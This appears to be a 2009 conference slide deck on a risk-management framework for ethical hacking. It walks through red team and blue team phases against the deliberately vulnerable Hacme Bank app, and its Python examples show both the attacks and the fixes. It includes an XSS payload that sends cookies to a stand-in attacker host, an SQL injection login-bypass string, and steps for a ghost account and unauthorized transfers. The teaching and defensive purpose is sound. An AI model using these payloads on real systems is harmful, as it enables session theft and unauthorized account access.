Inverting Risk Management for Ethical Hacking. SecureWorld Expo 09

Agenda
- Speaker Introductions
- Learning Objectives
- Framework of Risk Management & Analysis (FoRMA)
- Duality of Risk
- Demonstration of Information Warfare Scenario
- Wrap-Up, Q&A

Introductions
Speaker: Kris Kahn, CISSP, CISA, CGEIT, OPSA. Senior Staff, Electronic Security Governance, Seagate Technology LLC.
Co-Speaker: Brian Shura, PCI-QSA. Director of Penetration Testing, AppSec Consulting.

Audience
Attendees should be involved with penetration testing or managing risks, such as:
- IT Security Staff
- Risk Managers
- Company Officers
- Ethical Hackers
Recommended knowledge:
- Familiarity with security best practices
- Understanding of risk management concepts
- Experience with penetration testing

Learning Objectives
- Understand the advantage of validating your security measures through ethical hacking
- Recognize the benefits of applying risk management and risk exploitation methods
- Understand your control options to mitigate risks
- Balance your enterprise security using FoRMA

FoRMA Overview

Benefits of FoRMA
- Big Picture: a holistic relationship of related security models.
- Technology Independent: universal risk management concepts.
- Business Focused: minimize risk, instead of maximizing security.

Overview
FoRMA is a framework for integrating industry-standard models, such as CIA*, STRIDE* and others. It addresses the Risk and Control elements:
- Risk: Threat, Vulnerability
- Control: Technology, Process
*: See references at the end of the presentation material.

Goal of FoRMA: Risk Mitigation, i.e. control risks within acceptable limits to support business objectives.
- Establish your boundaries: define relevant policies, standards and best practices
- Protect assets and resources in accordance with policy
- Detect policy violations
- Assure policy compliance

Building your foundation
Start from the ground level and work your way up! Construct a strong security foundation on which to build your security policies, standards and best practices. Use industry-established security methodologies and codes of best practice to guide your standards and practices. A security foundation supports all layers (physical, network, application, etc.) and addresses each security implementation phase (Awareness, Protection, Detection and Assurance).

Building your foundation
Use each methodology with its sub-model to evaluate the corresponding subject:

Methodology                  Model    Subject
Threat Management            STRIDE*  Threat
Security Architecture        APAIN*   Technology
Security Management          RIVET*   Process
Asset/Resource Management    CIA*     Vulnerability

*: See references at the end of the presentation material.

Building your foundation
This is a layered model based on the ISO OSI reference model*, which identifies five (of the original seven) layers where critical assets and resources can be identified:
- Physical
- Network
- System
- Application
- Data

Risk Mitigation Life Cycle
Identify, Analyze, Control, Maintain, repeat. This process life cycle guides you through the framework to the appropriate security resolution.

Phase     Source              Target                    Result
Identify  Threat Discovery    Asset Valuation           Business Survey
Analyze   Threat Assessment   Vulnerability Assessment  Assessed Risk
Control   Threat Mitigation   Vulnerability Reduction   Controlled Risk
Maintain  Threat Management   Asset Management          Managed Risk

Risk Mitigation Life Cycle: Identify
Risks can be received through many input channels. If a risk comes from a security incident, the threat source needs to be identified to help guide the remediation. Inactive threats from untrusted sources should also be discovered. Valuing the business importance of the asset drives the prioritization of the remediation. (Identify: Threat Discovery, Asset Valuation, Business Survey.)

Risk Mitigation Life Cycle: Analyze
To determine the risk, you must understand the threat of attack and the vulnerability of the asset or resource. These items are measured and analyzed in detail to determine the corresponding risk. (Analyze: Threat Assessment, Vulnerability Assessment, Assessed Risk.)

Risk Mitigation Life Cycle: Control
Once you have assessed the risk, you can apply control mechanisms in the form of technology to mitigate the threat or reduce the vulnerability. (Control: Threat Mitigation, Vulnerability Reduction, Controlled Risk.)

Risk Mitigation Life Cycle: Maintain
Once a system is live, you apply counter-measures in the form of processes, either in the event of an attack (Incident Response) or to assure the integrity of the technology (Security Assessments). Implement change control and regular audit processes to verify when an aspect of the formula has changed. (Maintain: Threat Management, Asset/Resource Management, Managed Risk.)

FoRMA Model Overview (diagram)
Risk (Threat, Vulnerability) and Control (Technology, Process) sit at the center of the model; the four implementation phases surround them: Awareness, Protection, Detection, Assurance.

Implementation: Phases
1. Awareness
2. Protection
3. Detection
4. Assurance

Risk Mitigation Phases & Life Cycle
Each of the four phases (Awareness, Protection, Detection, Assurance) runs its own Identify, Analyze, Control, Maintain (IACM) cycle.

Duality of Risk

Risk Prevention vs Risk Exploitation
Using opposing objectives, the model can be used strategically to take advantage of vulnerabilities instead of preventing damage.

Risk Prevention        Life Cycle  Risk Exploitation
Discover               Identify    Reconnaissance
Evaluate Risks         Analyze     Evaluate Risks
Mitigate Risks         Control     Exploit Risks
Balance Risk/Control   Maintain    Risk/Control Divergence

Risk Analysis Strategies
The Blue Team's strategy is to create a balance by mitigating the risk with the appropriate amount of control. The remaining risk is acknowledged, regularly checked and managed:
Risk = Control (+/- acceptable residual control/risk)
The Red Team's strategy is to subvert the control and leverage the risk, keeping the scales tipped in their favor:
Risk > Control
Both teams need to analyze the risks and the controls to be able to execute their strategies.

FoRMA Model for Ethical Hacking (diagram)
The Red Team strategy mirrors the Blue Team strategy phase by phase, acting on the same Threats, Vulnerabilities, Technology and Process elements: Deception (vs. Awareness), Intrusion (vs. Protection), Evasion (vs. Detection), Corruption (vs. Assurance).
Kris Kahn, 2009, http://www.cybernetix.com/forma

Risk Exploitation Phases & Life Cycle
Each of the four Red Team phases (Deception, Intrusion, Evasion, Corruption) runs its own IACM cycle.

Information Warfare Scenario: Red Team/Blue Team Demonstration

Objectives
Business: become profitable by offering banking services on-line; validate security controls through a third-party pen test.
Blue Team (Operations): support the business by identifying and reducing risk.
Red Team (Ethical Hackers): exploit weaknesses to gain access to customer data, administrative functions and financial transactions.

Penetration and Defense Life-Cycles
Blue Team: 1. Awareness, 2. Protection, 3. Detection, 4. Assurance
Red Team: 1. Deception, 2. Intrusion, 3. Evasion, 4. Corruption
Background: the business selected a Windows system running an IIS web server as the online customer interface to its WebService-based banking system and back-end database (MS SQL Server).

Target
Free penetration testing platform: Hacme Bank simulates a "real-world" web-services-enabled online banking application, built with a number of known and common vulnerabilities.
09/16/2009 Kris Kahn, 2009

Red Team: Phase 1 (Deception)
I: Target web server
A: Manual JavaScript vulnerability test on web-based forum
C: Cross-Site Scripting (XSS) code to steal the admin cookie and reuse it
M: Elevate privileges of own account to admin status

Analyze (Risk Level: High)
Enter a test string into the forum (screenshot). Result (screenshot).
Conclusion: a vulnerability exists that allows an XSS attack, which may lead to Elevation of Privilege (admin access).

Control & Maintain (Risk Level: High)
Control: XSS code to steal and reuse the cookie to gain access (screenshot).
Maintain: set attacker account privilege to Admin type.

Blue Team: Phase 1 (Awareness)
I: Focus on accounts and authorized access
A: Validate user accounts and appropriate privileges
C: Repair access/accounts as necessary
M: Improve coding practices

Analyze (Risk Level: High)
Validate accounts through the database.
Conclusion: admin privileges are inappropriate for a user account; may be due to error, root cause analysis in progress. Remove unauthorized admin privileges from the user account.

Control & Maintain (Risk Level: Low)
Control: find the XSS attack in the forum and clean it up.
Maintain: patch to prevent special characters being entered in the forum using input validation; improve coding practices to anticipate this vulnerability.
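The forum fix above is stated as input validation. The control a practitioner would actually want is encoding on output (a forum legitimately needs "<", ">" and quotes in posts) plus an HttpOnly session cookie, which removes the payoff of the Phase 1 attack even if another injection slips through. The following is an added example in Python, not code from the deck or from Hacme Bank (which is ASP.NET); the forum posts, the cookie-stealing payload and the cookie name are constructed for illustration:

```python
import html
import re

# Constructed sample forum posts (not from the deck). The attack post carries a
# cookie-stealing payload of the kind used in Red Team Phase 1; the exact
# payload from the demo is not reproduced in the slides, so this one is assumed.
ATTACK_POST = (
    "Great bank! <script>new Image().src="
    "'http://attacker.example/c?'+document.cookie;</script>"
)
BENIGN_POST = "Is the 2% fee charged on transfers > $1000?"

POST_TEMPLATE = '<div class="post">{body}</div>'


def render_post_vulnerable(post_body: str) -> str:
    """The forum's original behaviour: user text is dropped straight into the
    HTML, so a <script> element in a post runs in every reader's browser."""
    return POST_TEMPLATE.format(body=post_body)


def render_post_safe(post_body: str) -> str:
    """Hardened rendering: encode on output so the browser treats the post as
    text. This is the primary XSS control; input validation on its own is not
    enough because '<', '>' and quotes are legitimate in forum text."""
    return POST_TEMPLATE.format(body=html.escape(post_body, quote=True))


ACTIVE_SCRIPT = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_active_script(rendered_html: str) -> bool:
    """Assurance check the Blue Team can run over rendered pages or stored
    posts: is there a live <script> tag that a browser would execute?"""
    return ACTIVE_SCRIPT.search(rendered_html) is not None


def session_cookie_header(session_id: str, http_only: bool = True) -> str:
    """Set-Cookie header for the admin session. With HttpOnly, document.cookie
    no longer exposes the value to injected script. The cookie name is an
    assumption, not taken from the deck."""
    flags = "; Path=/; Secure"
    if http_only:
        flags += "; HttpOnly"
    return f"Set-Cookie: ASP.NET_SessionId={session_id}{flags}"


if __name__ == "__main__":
    print(render_post_vulnerable(ATTACK_POST))
    print(render_post_safe(ATTACK_POST))
    print(session_cookie_header("d3adb33f"))
```

Run the safe renderer over the existing forum table as well as new posts: the stored payload from Phase 1 is only harmless once every place that displays it encodes it.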

Red Team: Phase 2 (Intrusion)
I: Target data flow
A: Test for SQL injection vulnerabilities
C: Exploit SQL injection flaws to bypass authentication and access the admin account
M: Gather sensitive information from the back-end database

Analyze (Risk Level: Medium)
Perform a manual test using a single quote (') to verify whether a field is vulnerable to SQL injection.
Conclusion: SQL injection is possible and may lead to Elevation of Privilege (admin access).

Control (Risk Level: High)
Use a SQL injection attack on the password field.

Control (Risk Level: High)
Successfully bypassed the authentication logic.

Maintain (Risk Level: High)
Leverage the admin function to gather additional data.

Blue Team: Phase 2 (Protection)
I: Focus on database server SQL activity
A: Assess potential unauthorized access to the back-end database through the application
C: Install a web application firewall for SQL injection protection
M: Update application code to use parameterized queries to prevent SQL injection

Analyze (Risk Level: High)
Unauthorized SQL activity discovered.
Conclusion: unauthorized access to the database through the application exposed user records with passwords.

Control & Maintain (Risk Level: Low)
Control: install WebKnight to mitigate the risk of SQL injection attacks.
Maintain: update application code to use parameterized queries to prevent SQL injection; encrypt passwords in the database.
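The Red Team's single-quote probe, the password-field bypass and the Blue Team's parameterized-query fix, side by side, as an added Python example (not code from the deck or from Hacme Bank). It uses an in-memory SQLite table in place of MS SQL Server, and stores passwords as salted PBKDF2 hashes rather than "encrypting" them, which is the form the stored-password fix should take: a reversible encryption key on the same server is exposed by the same injection. The users, passwords and the exact bypass payload are constructed; the deck does not show them.

```python
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 200_000


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def build_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the MS SQL back end.
    The plaintext 'password' column models the original schema; pw_salt and
    pw_hash model the hardened one."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT UNIQUE,"
        " password TEXT, pw_salt BLOB, pw_hash BLOB, is_admin INTEGER)"
    )
    for uid, name, pw, admin in [(1, "admin", "Adm1nPass!", 1), (2, "jsmith", "summer09", 0)]:
        salt = os.urandom(16)
        conn.execute("INSERT INTO users VALUES (?, ?, ?, ?, ?, ?)",
                     (uid, name, pw, salt, _hash_password(pw, salt), admin))
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Original pattern: user input concatenated into the SQL text.
    Returns (user_id, is_admin) or None."""
    sql = ("SELECT user_id, is_admin FROM users WHERE username = '"
           + username + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()


def login_safe(conn, username: str, password: str):
    """Hardened: parameterized query (input can never change the statement)
    and constant-time comparison against a salted PBKDF2 hash."""
    row = conn.execute(
        "SELECT user_id, is_admin, pw_salt, pw_hash FROM users WHERE username = ?",
        (username,),
    ).fetchone()
    if row is None:
        return None
    user_id, is_admin, salt, stored = row
    if not hmac.compare_digest(_hash_password(password, salt), stored):
        return None
    return (user_id, is_admin)


def single_quote_probe(login_fn, conn) -> bool:
    """The Red Team's Phase 2 test: a lone quote in the field. A database error
    means the quote reached the SQL parser, i.e. the field is injectable."""
    try:
        login_fn(conn, "jsmith", "'")
    except sqlite3.OperationalError:
        return True
    return False


# Assumed payload for the password field; the exact string from the demo is
# not in the deck. It turns the WHERE clause into "... OR '1'='1'", so the
# first row (the admin) comes back without a valid password.
BYPASS = "' OR '1'='1"


if __name__ == "__main__":
    db = build_db()
    print("vulnerable injectable:", single_quote_probe(login_vulnerable, db))
    print("vulnerable login as:", login_vulnerable(db, "admin", BYPASS))
    print("safe injectable:", single_quote_probe(login_safe, db))
    print("safe login as:", login_safe(db, "admin", BYPASS))
```

The WAF (WebKnight) buys time while the code is fixed; only the parameterized query removes the flaw, and the probe function gives the Blue Team a regression test to keep it removed.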

Red Team: Phase 3 (Evasion)
I: Target hidden directories and files
A: Evade signature-based detection and scan for application back doors
C: Access the test admin functionality without authenticating
M: Create a ghost account for the system owner

Analyze (Risk Level: Medium)
Use SensePost Wikto to identify back doors.
Conclusion: a back door may lead to admin functionality.

Control & Maintain (Risk Level: High)
Control: exploit the discovered development access to admin functionality.
Maintain: create a ghost account similar to the owner's name.

Blue Team: Phase 3 (Detection)
I: Focus on web activity
A: Review logs for problems or malicious activity
C: Clean up the production environment and disable the ghost account
M: Prevent external access to all admin functionality; access admin functions locally only

Analyze (Risk Level: High)
Web server log files show increased file size and activity.
Conclusion: web server scanning discovered a back door exposing admin functionality (again).

Control & Maintain (Risk Level: Low)
Control: remove the development back door and the ghost account.
Maintain: prevent unauthorized access to admin tools; use WebKnight to filter on the URL.

Maintain (Risk Level: Low)
...and retain local admin functionality.
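The Phase 3 log review and the URL filter, as an added Python example (not code from the deck, from Hacme Bank or from WebKnight). It parses a constructed IIS W3C log excerpt, flags a client whose run of 404s looks like a Wikto-style directory scan, and applies the rule the Blue Team delegates to the WAF: admin paths are served only to internal addresses. The log lines, the site paths, the admin page name and the internal address ranges are all assumptions.

```python
import ipaddress
from collections import Counter

# Constructed IIS W3C log excerpt (not from the deck). Paths and the admin page
# name are hypothetical. 203.0.113.7 runs a directory/back-door scan, then
# reaches a development admin page; 192.168.1.20 is an administrator on the LAN.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2009-09-16 10:01:02 203.0.113.7 GET /bank/_vti_bin/ 404
2009-09-16 10:01:02 203.0.113.7 GET /bank/backup/ 404
2009-09-16 10:01:03 203.0.113.7 GET /bank/old/ 404
2009-09-16 10:01:03 203.0.113.7 GET /bank/test/ 404
2009-09-16 10:01:03 203.0.113.7 GET /bank/dev/ 404
2009-09-16 10:01:04 203.0.113.7 GET /bank/admin/test.aspx 200
2009-09-16 10:02:10 192.168.1.20 GET /bank/admin/test.aspx 200
2009-09-16 10:03:00 198.51.100.9 GET /bank/main.aspx 200
2009-09-16 10:03:01 198.51.100.9 GET /bank/images/logo.gif 404
"""

# Assumed internal ranges and admin location; adjust to the real environment.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16", "127.0.0.0/8")]
ADMIN_PREFIXES = ("/bank/admin/",)


def parse_w3c(text: str):
    """Parse W3C extended log lines into dicts keyed by the #Fields names."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) == len(fields):
            records.append(dict(zip(fields, values)))
    return records


def find_scanners(records, min_404: int = 5):
    """Clients with at least min_404 'not found' responses: the footprint of a
    directory brute force, regardless of which wordlist it used. This catches
    the scan even when the tool avoids known attack signatures."""
    misses = Counter(r["c-ip"] for r in records if r["sc-status"] == "404")
    return {ip: n for ip, n in misses.items() if n >= min_404}


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def should_block(client_ip: str, uri_stem: str) -> bool:
    """URL filter rule: admin paths are served only to internal addresses."""
    return uri_stem.startswith(ADMIN_PREFIXES) and not is_internal(client_ip)


def find_external_admin_access(records):
    """Requests the URL filter would have blocked, for retrospective review
    of the window before the filter was in place."""
    return [(r["c-ip"], r["cs-uri-stem"]) for r in records
            if should_block(r["c-ip"], r["cs-uri-stem"])]


if __name__ == "__main__":
    recs = parse_w3c(SAMPLE_LOG)
    print("scanners:", find_scanners(recs))
    print("external admin hits:", find_external_admin_access(recs))
```

A URL filter on the WAF is a compensating control: the development page is still reachable by anyone who gets onto the internal network, so removing the back door from production (the Control step above) remains the actual fix.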

Red Team: Phase 4 (Corruption)
I: Identify other opportunities to access back-end data by reviewing details of previous error messages
A: Test access to XML forms
C: Use the WebService to transfer funds
M: Re-enable the attacker account

Analyze (Risk Level: Low)
Identify other, non-application opportunities to access the data (captured previously).

Analyze (Risk Level: Medium)
Test the available methods.
Conclusion: the lookup-by-userid method is not restricted.

Control (Risk Level: Medium)
Use the soapUI tool to generate a request.

Control (Risk Level: Medium)
Acquire the account number using the GetUserAccounts method.

Control (Risk Level: Medium)
Determine the system owner's account balance.

Control & Maintain (Risk Level: High)
Control: transfer funds.
Maintain: use the WebService to re-enable the attacker account.

Blue Team: Phase 4 (Assurance)
I: Focus on transaction activity
A: Identify significant banking activity and look for errors
C: Correct unauthorized account transfers, remove the offending account
M: Implement authorization between the web application and the WebService

Analyze (Risk Level: High)
Identify significant banking activity and an account balance discrepancy.
Conclusion: an internal WebService exposed externally is allowing unauthorized and unauthenticated access.

Control & Maintain (Risk Level: Low)
Control: audit all account activity and reverse unauthorized transactions; implement a manual approval control for large on-line transfers; restrict the WebService to internal IP addresses only.
Maintain: implement authentication between the calling application (Hacme Bank) and the web service.
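The Phase 4 exchange from both sides, as an added Python example (not code from the deck, from Hacme Bank or from soapUI). It builds the SOAP envelope soapUI would send for GetUserAccounts, then dispatches it against a minimal service that, with the new controls off, answers any caller (the state the Red Team found), and with them on applies both fixes from the slide: an internal-address restriction and caller authentication, here modelled as an HMAC over the request body with a secret shared between the web application and the service. The service namespace, the parameter names, the TransferFunds method, the shared secret, the internal range and the account data are all assumptions.

```python
import hashlib
import hmac
import ipaddress
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SVC_NS = "http://bank.invalid/ws"                      # assumed service namespace
SHARED_SECRET = b"app-to-service-secret"               # assumed; provisioned out of band
INTERNAL_NET = ipaddress.ip_network("192.168.0.0/16")  # assumed LAN range

# Constructed account data (not from the deck): owner -> {account: balance}.
ACCOUNTS = {"owner": {"1001-1": 5000.0}, "attacker": {"2002-2": 10.0}}


def build_request(method: str, params: dict) -> str:
    """Build the SOAP envelope a client such as soapUI sends, e.g.
    GetUserAccounts(userId). Parameter names are assumptions."""
    env = ET.Element(f"{{{SOAP_NS}}}Envelope")
    body = ET.SubElement(env, f"{{{SOAP_NS}}}Body")
    op = ET.SubElement(body, f"{{{SVC_NS}}}{method}")
    for name, value in params.items():
        ET.SubElement(op, f"{{{SVC_NS}}}{name}").text = str(value)
    return ET.tostring(env, encoding="unicode")


def sign_request(body_xml: str) -> str:
    """Caller authentication: HMAC-SHA256 over the exact bytes sent, which only
    the web application (holder of the shared secret) can produce."""
    return hmac.new(SHARED_SECRET, body_xml.encode(), hashlib.sha256).hexdigest()


def handle_request(body_xml: str, client_ip: str, signature: str = None,
                   require_auth: bool = True):
    """Service-side dispatch. require_auth=False reproduces the exposed,
    unauthenticated service from the demo; True applies both new controls."""
    if require_auth:
        if ipaddress.ip_address(client_ip) not in INTERNAL_NET:
            return {"fault": "Client.Forbidden"}          # external source
        if signature is None or not hmac.compare_digest(sign_request(body_xml), signature):
            return {"fault": "Client.Unauthenticated"}    # not the web application
    root = ET.fromstring(body_xml)
    op = root.find(f"{{{SOAP_NS}}}Body/*")
    method = op.tag.split("}")[1]
    params = {child.tag.split("}")[1]: child.text for child in op}
    owner_of = {acct: owner for owner, accts in ACCOUNTS.items() for acct in accts}
    if method == "GetUserAccounts":
        return {"accounts": sorted(ACCOUNTS.get(params["userId"], {}))}
    if method == "TransferFunds":
        src, dst, amount = params["fromAccount"], params["toAccount"], float(params["amount"])
        if src not in owner_of or dst not in owner_of or ACCOUNTS[owner_of[src]][src] < amount:
            return {"fault": "Client.InvalidTransfer"}
        ACCOUNTS[owner_of[src]][src] -= amount
        ACCOUNTS[owner_of[dst]][dst] += amount
        return {"ok": True}
    return {"fault": "Client.UnknownMethod"}


if __name__ == "__main__":
    req = build_request("GetUserAccounts", {"userId": "owner"})
    print(req)
    print("exposed:", handle_request(req, "203.0.113.7", require_auth=False))
    print("restricted:", handle_request(req, "203.0.113.7"))
    print("internal, signed:", handle_request(req, "192.168.1.20", sign_request(req)))
```

Note what the signature does and does not give you: it proves the request came from the web application, not that the application's end user is entitled to that userId. Authorization of the end user against the account still has to happen in the application, which is why the slide lists both authentication and authorization between the two tiers.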

Wrap-Up

Wrap-Up
- Design security controls with the attacker's perspective in mind (and vice versa).
- Be proactive in the implementation of phased controls.
- Validate your controls through ethical hacking to ensure effectiveness.
- Balance your enterprise security using a risk-based framework (FoRMA) that is focused on supporting business objectives.

Questions?
Feedback and comments are welcome. Contact information: Kris.Kahn@mac.com, 831-419-1256

Tools (downloadable, non-commercial)
- Foundstone HacmeBank: http://www.foundstone.com/us/resources/proddesc/hacmebank.htm
- Paros: http://www.parosproxy.org/
- SensePost Wikto: http://www.sensepost.com/research/wikto/
- SoapUI: http://www.soapui.org/
- SQL Express Profiler: http://code.google.com/p/sqlexpressprofiler/downloads/list
- WebKnight: http://aqtronix.com/?pageid=99

References (*)
- Control Objectives for IT and Related Technology (COBIT), trademarked by the IT Governance Institute (ITGI).
- Open Systems Interconnection (OSI) reference model, developed by the International Organization for Standardization (ISO) in 1984 and now considered the primary architectural model for inter-computer communications.
- STRIDE Threat Model, conceived, built upon and evangelized at Microsoft by Loren Kohnfelder, Praerit Garg, Jason Garms and Michael Howard. Explained further in Writing Secure Code, 2nd Ed. (ISBN 0-7356-1722-8), pages 83-86.
- CIA Security Model, author unknown, taught as part of the Common Body of Knowledge for the CISSP curriculum.
- APAIN, acronym for Security Architecture, developed by Curtis Coleman in 2001.
- RIVET, acronym for Security Management, developed by Kris Kahn in 2004.
- Failure Mode and Effects Analysis (FMEA) evolved as a process tool used by the United States military as early as 1949 and is currently part of the Six Sigma curriculum.
- Capability Maturity Model (CMM) is a trademark of Carnegie Mellon University.